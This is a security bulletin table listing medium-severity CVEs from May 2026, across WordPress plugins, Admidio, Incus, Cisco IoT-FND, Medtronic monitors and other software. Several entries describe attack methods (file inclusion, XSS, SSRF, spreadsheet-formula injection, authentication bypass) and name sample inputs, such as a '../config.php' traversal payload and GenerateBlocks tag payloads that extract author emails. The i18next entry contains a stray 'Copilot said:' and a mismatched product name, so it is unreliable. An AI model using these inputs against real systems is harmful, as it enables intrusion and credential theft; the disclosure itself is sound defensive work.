| cab-fare-calculator--cab-fare-calculator | WordPress Plugin cab-fare-calculator 1.0.3 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the controller parameter in tblight.php. Attackers can supply path traversal sequences through the controller GET parameter to include and execute files outside the intended controllers directory. | 2026-05-10 | 6.2 | CVE-2022-50954 | ExploitDB-50843 Official Product Homepage VulnCheck Advisory: WordPress Plugin cab-fare-calculator 1.0.3 Local File Inclusion |
| amministrazione-aperta--amministrazione-aperta | WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the open parameter. Attackers can supply file paths through the open GET parameter in dispatcher.php to include and read sensitive files accessible to the web server. | 2026-05-10 | 6.2 | CVE-2022-50956 | ExploitDB-50838 Official Product Homepage VulnCheck Advisory: WordPress Plugin amministrazione-aperta 3.7.3 Local File Read |
| avatar_uploader--avatar_uploader | Drupal avatar_uploader 7.x-1.0-beta8 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the file parameter. Attackers can craft URLs with script payloads in the file parameter of avatar_uploader.pages.inc to execute arbitrary JavaScript in victim browsers. | 2026-05-10 | 6.1 | CVE-2022-50957 | ExploitDB-50841 Product Reference VulnCheck Advisory: Drupal avatar_uploader 7.x-1.0-beta8 Reflected XSS |
| jetpack--Jetpack | WordPress Plugin Jetpack 9.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the post_id parameter. Attackers can craft URLs to the grunion-form-view.php endpoint with script payloads in the post_id parameter to execute arbitrary JavaScript in victim browsers. | 2026-05-10 | 6.1 | CVE-2022-50958 | ExploitDB-50735 Product Reference VulnCheck Advisory: WordPress Plugin Jetpack 9.1 Cross Site Scripting via grunion-form-view.php |
| wpdevart--Contact Form Builder | WordPress Contact Form Builder 1.6.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by exploiting the form_id parameter. Attackers can craft malicious URLs to code_generator.php with script payloads in the form_id parameter to execute arbitrary JavaScript in victim browsers. | 2026-05-10 | 6.1 | CVE-2022-50959 | ExploitDB-50734 Product Reference VulnCheck Advisory: WordPress Contact Form Builder 1.6.1 Cross-Site Scripting via code_generator.php |
| Varun Sridharan--International Sms For Contact Form | WordPress International Sms For Contact Form 7 Integration version 1.2 contains a reflected cross-site scripting vulnerability in the page parameter of the admin settings interface. Attackers can inject malicious scripts through the page parameter in class-sms-log-display.php to execute arbitrary JavaScript in administrator browsers. | 2026-05-10 | 6.1 | CVE-2022-50960 | ExploitDB-50719 Product Reference VulnCheck Advisory: WordPress International Sms Contact Form 7 Integration 1.2 XSS |
| IP2Location--IP2Location Country Blocker | WordPress Plugin IP2Location Country Blocker 2.26.7 contains a stored cross-site scripting vulnerability that allows authenticated users to inject arbitrary JavaScript code through the Frontend Settings interface. Attackers can inject malicious scripts in the URL field of the Display page settings that execute when administrators or other authenticated users visit the plugin settings page. | 2026-05-10 | 6.4 | CVE-2022-50961 | ExploitDB-50709 Product Reference VulnCheck Advisory: WordPress Plugin IP2Location Country Blocker 2.26.7 Stored XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the orders/myOrders module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50962 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 myOrders Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/active module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50963 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 myAuctions active Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/loose module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50964 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 myAuctions loose Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the posts/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50965 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 posts manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the news/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50966 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 news manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the tickets/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50967 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 tickets manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50968 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 auctions manage Reflected XSS |
| uBidAuction--uBidAuction | uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the backend/mailingLog/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers. | 2026-05-10 | 6.1 | CVE-2022-50969 | Exploit-DB Vulnerability Lab Advisory Product Homepage VulnCheck Advisory: uBidAuction 2.0.1 mailingLog manage Reflected XSS |
| Spondonit--AmazCart CMS | AmazCart CMS 3.4 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search functionality. Attackers can enter script tags in the search box to execute arbitrary JavaScript that fires when search history is viewed or results are displayed. | 2026-05-05 | 6.1 | CVE-2023-54349 | ExploitDB-51219 Official Product Homepage Product Reference VulnCheck Advisory: AmazCart CMS 3.4 Reflected Cross-Site Scripting via Search |
| Mikrotik--RouterOS | RouterOS provides various services that rely on correct verification of client and server certificates to secure confidentiality and integrity of communications. This includes OpenVPN, CAPsMAN, Dot1x (802.1X), among others. The vulnerability lies in shared certificate validation logic which uses the system certificate store that is shared and equally trusted by all system services. This causes confusion of scope, allowing any certificate authority present in the system-wide trust store to be trusted in any context (with some exceptions), allowing partial or full authentication bypass in CAPsMAN, OpenVPN, Dot1X and potentially others. | 2026-05-05 | 6.5 | CVE-2025-42611 | https://www.cert.si/en/cve-2025-42611/ |
| Medtronic--MyCareLink Patient Monitor 24950 | Medtronic MyCareLink Patient Monitor has an internal serial interface, which allows an attacker with physical access to access a login prompt via a UART terminal. | 2026-05-07 | 6.8 | CVE-2025-4386 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/mycarelink-patient-monitor-vulnerabilities.html https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01 |
| Medtronic--MyCareLink Patient Monitor 24950 | Medtronic MyCareLink Patient Monitor uses per-product credentials that are stored in a recoverable format. An attacker can use these credentials to modify encrypted drive data. | 2026-05-07 | 6.8 | CVE-2025-4397 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/mycarelink-patient-monitor-vulnerabilities.html https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01 https://www.medtronic.com/en-us/e/product-security/security-bulletins/mycarelink-8-7-18.html https://www.cisa.gov/news-events/ics-medical-advisories/icsma-18-219-01 |
| Qualcomm, Inc.--Snapdragon | Transient DOS when processing target power rate tables during channel configuration. | 2026-05-04 | 6.5 | CVE-2025-47401 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Transient DOS when processing a malformed Fast Transition response frame with an invalid header structure during wireless roaming. | 2026-05-04 | 6.5 | CVE-2025-47403 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when dynamically changing the size of a previously allocated buffer while its contents are being modified. | 2026-05-04 | 6.5 | CVE-2025-47404 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Information Disclosure while processing IOCTL handler callbacks without verifying buffer size. | 2026-05-04 | 6.1 | CVE-2025-47406 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Apache Software Foundation--Apache CloudStack | Due to multiple time-of-check time-of-use race conditions in the resource count check and increment logic, as well as missing validations, users of the platform are able to exceed the allocation limits configured for their accounts/domains. This can be used by an attacker to degrade the infrastructure's resources and lead to denial of service conditions. Users are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue. | 2026-05-08 | 6.5 | CVE-2025-69233 | https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm |
| Hikvision--HikCentral Professional | There is an Access Control Vulnerability in some HikCentral Professional versions. This could allow an unauthenticated user to obtain the admin permission. | 2026-05-09 | 6.8 | CVE-2026-1749 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-hikcentral-professional/ |
| Cisco--Cisco IoT Field Network Director (IoT-FND) | A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to retrieve files that they do not have permission to access. This vulnerability is due to insufficient file access checks. An attacker could exploit this vulnerability by submitting crafted input in the web-based management interface. A successful exploit could allow the attacker to read files that they are not authorized to access. | 2026-05-06 | 6.5 | CVE-2026-20168 | cisco-sa-iot-fnd-dos-n8N26Q4u |
| Cisco--Cisco IoT Field Network Director (IoT-FND) | A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to access files and execute commands on a remote router. This vulnerability is due to insufficient input validation of user-supplied data. An attacker could exploit this vulnerability by submitting crafted input in the web-based management interface. A successful exploit could allow the attacker to create, read, or delete files and execute limited commands in user EXEC mode on a remote router. | 2026-05-06 | 6.4 | CVE-2026-20169 | cisco-sa-iot-fnd-dos-n8N26Q4u |
| WProyal--Royal Elementor Addons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WProyal Royal Elementor Addons allows Stored XSS. This issue affects Royal Elementor Addons: from n/a before 1.7.1053. | 2026-05-07 | 6.5 | CVE-2026-27421 | https://patchstack.com/database/wordpress/plugin/royal-elementor-addons/vulnerability/wordpress-royal-elementor-addons-plugin-1-7-1053-cross-site-scripting-xss-vulnerability?_s_id=cve |
| traccar--traccar | Traccar is an open source GPS tracking system. In versions between 6.11.1 and 6.13.0, the CSV export functionality writes position data, including user-controlled device and computed attributes, to CSV output without proper escaping. An attacker can inject spreadsheet formulas through exported fields. When a manager or administrator opens the exported CSV file in spreadsheet software, this can cause formula execution and lead to command execution or data exfiltration. This has been patched in version 6.13.0. | 2026-05-05 | 6.5 | CVE-2026-27644 | https://github.com/traccar/traccar/security/advisories/GHSA-745r-9qgj-x7m7 https://github.com/traccar/traccar/blob/v6.11.1/src/main/java/org/traccar/reports/CsvExportProvider.java#L89-L91 |
| jegstudio--Gutenverse Ultimate WordPress FSE Blocks Addons & Ecosystem | The Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'separatorIconSVG' parameter in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-2868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc540e5c-180f-4743-b1fb-608aa0e3ae79?source=cve https://plugins.trac.wordpress.org/changeset/3507804/gutenverse |
| jegstudio--Gutenverse Ultimate WordPress FSE Blocks Addons & Ecosystem | The Gutenverse - Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.5.3 via the import_images() function. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-05-05 | 6.4 | CVE-2026-2948 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac909a4b-d949-42eb-871a-963bc6242c12?source=cve https://plugins.trac.wordpress.org/changeset/3507804/gutenverse |
| gofiber--fiber | Fiber is a web framework for Go. In github.com/gofiber/fiber/v3 versions through 3.1.0, the default key generator in the cache middleware uses only the request path and does not include the query string. As a result, requests for the same path with different query parameters can share a cache key and receive the wrong cached response. This can cause response mix-up for query-dependent endpoints and may expose data intended for a different request. This issue is fixed after version 3.1.0. | 2026-05-05 | 6.5 | CVE-2026-30246 | https://github.com/gofiber/fiber/security/advisories/GHSA-35hp-hqmv-8qg8 https://github.com/gofiber/fiber/blob/main/middleware/cache/cache_test.go#L599-L621 https://github.com/gofiber/fiber/blob/main/middleware/cache/config.go#L90-L92 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the X.Org X server. This out-of-bounds read vulnerability in the XKB geometry processing, specifically within the `CheckSetGeom()` and `XkbAddGeomKeyAlias` functions, allows an attacker to read uninitialized or out-of-bounds memory. An attacker with a connection to the X11 server, either locally or remotely, can exploit this without user interaction. This could lead to the disclosure of memory contents or cause a denial of service by crashing the server. | 2026-05-05 | 6.1 | CVE-2026-34000 | https://access.redhat.com/security/cve/CVE-2026-34000 RHBZ#2451107 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in the X.Org X server. This vulnerability, an out-of-bounds read, affects the XKB (X Keyboard Extension) modifier map handling. An attacker with access to the X11 server can exploit this by sending a malformed request, which causes the server to read beyond its intended memory boundaries. This can lead to the exposure of sensitive information or cause the server to crash, resulting in a denial of service. | 2026-05-05 | 6.1 | CVE-2026-34002 | https://access.redhat.com/security/cve/CVE-2026-34002 RHBZ#2451112 |
| edge22--GenerateBlocks | The GenerateBlocks plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.0. This is due to missing object-level authorization checks in the /wp-json/generateblocks/v1/dynamic-tag-replacements REST endpoint. The endpoint only verifies that the user has the edit_posts capability but does not verify the user has permission to access the specific post or its associated data referenced by attacker-controlled id parameters in dynamic tag content. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive information from arbitrary posts including author email addresses and non-protected post meta values by crafting dynamic tag payloads such as {{post_meta id:<target>|key:<meta_key>}} and {{post_title id:<target>|link:author_email}}. | 2026-05-05 | 6.5 | CVE-2026-3454 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0297d524-e016-4f8d-920c-d58c62edb2a0?source=cve https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tags.php#L424 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tags.php#L501 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tag-callbacks.php#L64 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tag-callbacks.php#L364 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/class-meta-handler.php#L335 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.2.0/includes/dynamic-tags/class-dynamic-tags.php#L392 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3495827%40generateblocks%2Ftrunk&old=3415721%40generateblocks%2Ftrunk&sfp_email=&sfph_mail= |
| Oracle Corporation--Oracle OCI CLI of Oracle Open Source Projects | Vulnerability in the Oracle OCI CLI product of Oracle Open Source Projects. The supported versions that is affected is 3.77. Easily exploitable vulnerability allows unauthenticated attacker with network access to compromise Oracle OCI CLI. Successful attacks of this vulnerability can result in Oracle OCI CLI allowing users to place imported files outside the intended directory. | 2026-05-06 | 6.1 | CVE-2026-35254 | Oracle Advisory |
| Oracle Corporation--Oracle Cloud Native Environment Command Line Interface | Vulnerability in the Oracle Cloud Native Environment Command Line Interface product of Oracle Open Source Projects. The supported versions that is affected is v2.3.2. Easily exploitable vulnerability allows unauthenticated attacker to compromise Oracle Cloud Native Environment Command Line Interface product via a malicious environment variable. Successful attacks of this vulnerability can result in Oracle Cloud Native Environment Command Line Interface allowing users to execute arbitrary code. | 2026-05-06 | 6.6 | CVE-2026-35255 | Oracle Advisory |
| OpenStack--Cyborg | In OpenStack Cyborg before 16.0.1, the Accelerator Request (ARQ) API does not enforce project ownership at any layer. The project_id column in the database is never populated (NULL for every ARQ), database queries have no project filtering, and policy checks are self-referential (the authorize_wsgi decorator compares the caller's project_id with itself rather than the target resource). Any authenticated non-admin user can complete various actions such as deleting ARQs bound to other projects' instances, aka cross-tenant denial of service. | 2026-05-07 | 6.3 | CVE-2026-40214 | https://bugs.launchpad.net/openstack-cyborg/+bug/2144056 https://www.openwall.com/lists/oss-security/2026/05/07/6 https://security.openstack.org/ossa/OSSA-2026-011.html |
| pglombardo--PasswordPusher | Password Pusher is an open source application to communicate sensitive information over the web. Prior to versions 1.69.3 and 2.4.2, a security issue in OSS PasswordPusher allowed unauthenticated creation of file-type pushes through a generic JSON API create path under certain configurations. This could bypass the intended authentication boundary for file push creation. This issue has been patched in versions 1.69.3 and 2.4.2. | 2026-05-08 | 6.5 | CVE-2026-41308 | https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-qfh8-f79c-x86c https://github.com/pglombardo/PasswordPusher/pull/4381 https://github.com/pglombardo/PasswordPusher/commit/45dc2512875231ef45ecd5dfc8c3c8185f882bf4 |
| ironfede--openmcdf | OpenMcdf is a fully .NET / C# library to manipulate Compound File Binary File Format files, also known as Structured Storage. Prior to version 3.1.3, OpenMcdf does not detect cycles in the directory entry red-black tree of a Compound File Binary (CFB) document. A crafted CFB file with a cycle in the LeftSiblingID / RightSiblingID chain causes Storage.EnumerateEntries() and Storage.OpenStream() to loop indefinitely, consuming the calling thread with no possibility of recovery via try/catch. This issue has been patched in version 3.1.3. | 2026-05-08 | 6.2 | CVE-2026-41511 | https://github.com/openmcdf/openmcdf/security/advisories/GHSA-jxpf-xq2m-q525 https://github.com/openmcdf/openmcdf/commit/24f445a557fc4f46461cf6d02d296cce16c293a0 https://github.com/openmcdf/openmcdf/releases/tag/v3.1.3 |
| th30d4y--IP | In th30d4y/IP from version 1.0.1 to before version 2.0.1, a DOM-Based Cross-Site Scripting (XSS) vulnerability was identified in an IP Reputation Checker application. Unsanitized user input was directly rendered in the browser, allowing attackers to execute arbitrary JavaScript. This issue has been patched in version 2.0.1. | 2026-05-08 | 6.1 | CVE-2026-41575 | https://github.com/th30d4y/IP/security/advisories/GHSA-j7wv-7j97-9qh9 |
| marko-js--marko | Marko is a declarative, HTML-based language for building web apps. Prior to marko version 5.38.36 and prior to @marko/runtime-tags 6.0.164, when dynamic text is interpolated into a <script> or <style> tag the Marko runtime failed to prevent tag breakout when the closing tag used non-lowercase casing. An attacker able to place input inside a <script> or <style> block could break out of the tag with </SCRIPT>, </Style>, etc. and inject arbitrary HTML/JavaScript, resulting in cross-site scripting. This issue has been patched in marko version 5.38.36 and @marko/runtime-tags 6.0.164. | 2026-05-08 | 6.4 | CVE-2026-41591 | https://github.com/marko-js/marko/security/advisories/GHSA-x9fj-57fh-c8wq |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, a missing error handling could lead an authenticated Incus user to cause a daemon crash through the import of a truncated storage bucket backup file. This issue has been patched in version 7.0.0. | 2026-05-07 | 6.5 | CVE-2026-41647 | https://github.com/lxc/incus/security/advisories/GHSA-fwj8-62r8-8p8m https://github.com/lxc/incus/releases/tag/v7.0.0 |
| NaturalIntelligence--fast-xml-parser | fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the "-->" sequence in comment content or the "]]>" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0. | 2026-05-07 | 6.1 | CVE-2026-41650 | https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6 https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the ecard_preview.php endpoint does not validate that the ecard_template POST parameter is a safe filename before passing it to ECard::getEcardTemplate(). An authenticated user can supply a path traversal payload (e.g., ../config.php) to read arbitrary files accessible to the web server process, including adm_my_files/config.php which contains database credentials. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.5 | CVE-2026-41655 | https://github.com/Admidio/admidio/security/advisories/GHSA-m3vp-3jjm-gpmx https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the Admidio inventory module enforces authorization for destructive operations (delete, retire, reinstate) only in the UI layer by conditionally rendering buttons. The backend POST handlers at modules/inventory.php for item_delete, item_retire, item_reinstate, item_picture_upload, item_picture_save, and item_picture_delete perform CSRF validation but never check whether the requesting user is an inventory administrator. Any authenticated user who can access the inventory module can permanently delete any inventory item and all its associated data. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.5 | CVE-2026-41658 | https://github.com/Admidio/admidio/security/advisories/GHSA-xqv4-xm7h-52cv https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, an unauthenticated attacker can execute arbitrary JavaScript in any Admidio user's browser through a reflected XSS in system/msg_window.php. The endpoint passes user input through htmlspecialchars(), which does not encode square brackets. A subsequent call to Language::prepareTextPlaceholders() converts those brackets into HTML angle brackets, producing executable markup. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.1 | CVE-2026-41661 | https://github.com/Admidio/admidio/security/advisories/GHSA-gq27-fc8w-vcmp https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the OIDC token introspection endpoint (/modules/sso/index.php/oidc/introspect) always returns {"active": true} for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (/oidc/revoke) returns {"revoked": true} without actually revoking any token, preventing resource servers from invalidating compromised credentials. This issue has been patched in version 5.0.9. | 2026-05-07 | 6.8 | CVE-2026-41671 | https://github.com/Admidio/admidio/security/advisories/GHSA-9xx5-cv6j-x533 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, backup.GetInfo() trusts the inline backup/index.yaml config when present and only falls back to parsing the legacy backup/container/backup.yaml file if result.Config == nil. As a result, an archive can carry a valid inline config that passes the initial import preflight while also carrying a malformed legacy backup/container/backup.yaml file that is reparsed later from the restored file system. ParseConfigYamlFile() accepts YAML documents with no container section, and multiple downstream consumers then dereference. Container without checking for nil. Confirmed examples in the instance restore and import flow include backup.UpdateInstanceConfig() and internalImportFromBackup(). An authenticated user with permission to import instance backups may be able to crash the Incus daemon with a crafted backup archive whose inline backup/index.yaml is valid but whose extracted legacy backup.yaml omits container. The crash occurs in the restore path after archive extraction has begun. This issue has been patched in version 7.0.0. | 2026-05-07 | 6.5 | CVE-2026-41684 | https://github.com/lxc/incus/security/advisories/GHSA-x5r6-jr56-89pv https://github.com/lxc/incus/releases/tag/v7.0.0 |
| ellite--Wallos | Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the webhook notification feature reuses an administrator-configured local-target allowlist for every logged-in user. Any normal user can fully control a webhook URL, headers, and body, then use Wallos to send server-side requests to allowlisted internal automation services. When such a target exposes deployment or execution APIs, this can further enable adjacent-service RCE, but that downstream result is conditional on the target service. At time of publication, there are no publicly available patches. | 2026-05-07 | 6 | CVE-2026-41689 | https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv |
| i18next--i18next-http-backend | Copilot said: i18nextify is a JavaScript library that adds i18nextify is a JavaScript library that adds website internationalization via a script tag, without source code changes. Versions prior to 3.0.5 interpolate the lng and ns values directly into the configured loadPath / addPath URL template without any encoding, validation, or path sanitisation. When an application exposes the language-code selection to user-controlled input (the default - i18next-browser-languagedetector reads ?lng= query params, cookies, localStorage, and request headers), an attacker can inject characters that change the structure of the outgoing request URL. This is a single URL-injection vulnerability. The attacker-controlled value is neutralised before it is used as part of an output URL string; the attack shape covers both path traversal and broader URL-structure injection - both are closed by the one interpolateUrl sanitisation fix. This issue has been fixed in version 3.0.5. If users cannot upgrade immediately, they can work around the issue by sanitising lng / ns before they reach i18next (strip .., /, \, ?, #, %, whitespace, and control characters; cap the length). | 2026-05-07 | 6.5 | CVE-2026-41691 | https://github.com/i18next/i18next-http-backend/security/advisories/GHSA-q89c-q3h5-w34g https://github.com/i18next/i18next-http-backend/commit/4cee84f229c637b9c182366d3156f726d407a621 |
| locize--i18next-locize-backend | i18next-locize-backend is a simple i18next backend for locize.com which can be used in Node.js, in the browser and for Deno. Prior to version 9.0.2, i18next-locize-backend interpolates lng, ns, projectId, and version directly into the configured loadPath / privatePath / addPath / updatePath / getLanguagesPath URL templates with no path-component validation and no encoding. When an application exposes any of these values to user-controlled input (?lng= / ?ns= query parameters via i18next-browser-languagedetector, cookies, request headers, or a URL-derived projectId), a crafted value can change the structure of the outgoing request URL. Affected call sites in lib/index.js (pre-patch): the interpolate() helper is used at the five URL-build sites - _readAny/read (line 415 for private, 426 for public), getLanguages (lines 271 and 296), and writePage (lines 616 and 622) for the missing-key and update POST paths. The helper interpolate in lib/utils.js substitutes raw values with no encoding. This issue has been patched in version 9.0.2. | 2026-05-08 | 6.5 | CVE-2026-41885 | https://github.com/locize/i18next-locize-backend/security/advisories/GHSA-mgcp-mfp8-3q45 |
| givanz--Vvveb | Vvveb before 1.0.8.2 contains an unauthenticated reflected cross-site scripting vulnerability in the visual editor preview renderer that allows attackers to execute arbitrary JavaScript by manipulating the r query parameter and _component_ajax POST parameter. Attackers can craft a malicious link or auto-submitted form that causes victims to execute attacker-controlled JavaScript in the context of the Vvveb origin, as the gating function isEditor() performs no session, role, or token verification and the view handler injects raw HTML POST body content without sanitization. | 2026-05-07 | 6.1 | CVE-2026-41929 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-wwmv-4g9g-p48g https://github.com/givanz/Vvveb/commit/54a9e846fb94192f1b31ae81d81d25c874662e6a https://www.vulncheck.com/advisories/vvveb-unauthenticated-reflected-xss-via-visual-editor |
| langgenius--dify | Dify before version 1.14.0 contains an authorization bypass vulnerability that allows authenticated users to read the full contents of files uploaded by other users within the same tenant by supplying an arbitrary file UUID in the files array of a chat-messages request. Attackers can exploit insufficient permission verification in the chat-messages endpoints to access files without ownership validation, bypassing workspace separation and signed URL protections to retrieve sensitive file contents through workflow processing. | 2026-05-05 | 6.5 | CVE-2026-41950 | https://github.com/langgenius/dify/releases/tag/1.14.0 https://huntr.com/bounties/181136ec-d957-4b75-8ea7-6fa7b8abd01d https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-uuid |
| MapServer--MapServer | MapServer is a system for developing web-based GIS applications. From version 6.0 to before version 8.6.2, a reflected XSS vulnerability in MapServer's WMS server allows an unauthenticated attacker to inject arbitrary HTML/JavaScript into the browser of any user who opens a crafted WMS URL. The vulnerability is triggered via FORMAT=application/openlayers combined with an unsanitized SRS parameter in WMS 1.3.0 requests. This issue has been patched in version 8.6.2. | 2026-05-08 | 6.1 | CVE-2026-42030 | https://github.com/MapServer/MapServer/security/advisories/GHSA-4g9f-ph64-hg2x https://github.com/MapServer/MapServer/releases/tag/rel-8-6-2 |
| patrickhener--goshs | goshs is a SimpleHTTPServer written in Go. Prior to version 2.0.2, the PUT upload handler (httpserver/updown.go) lacks the CSRF token validation that was added to the POST upload handler during the CVE-2026-40883 fix. Combined with the unconditional Access-Control-Allow-Origin: * on the OPTIONS preflight handler (httpserver/server.go), any website can write arbitrary files to a goshs instance through the victim's browser - bypassing network isolation (e.g. localhost, internal network). This issue has been patched in version 2.0.2. | 2026-05-04 | 6.5 | CVE-2026-42091 | https://github.com/patrickhener/goshs/security/advisories/GHSA-rhf7-wvw3-vjvm https://github.com/patrickhener/goshs/commit/0e715b94e10c3d1aa552276000f15f104dee2f32 https://github.com/patrickhener/goshs/releases/tag/v2.0.2 |
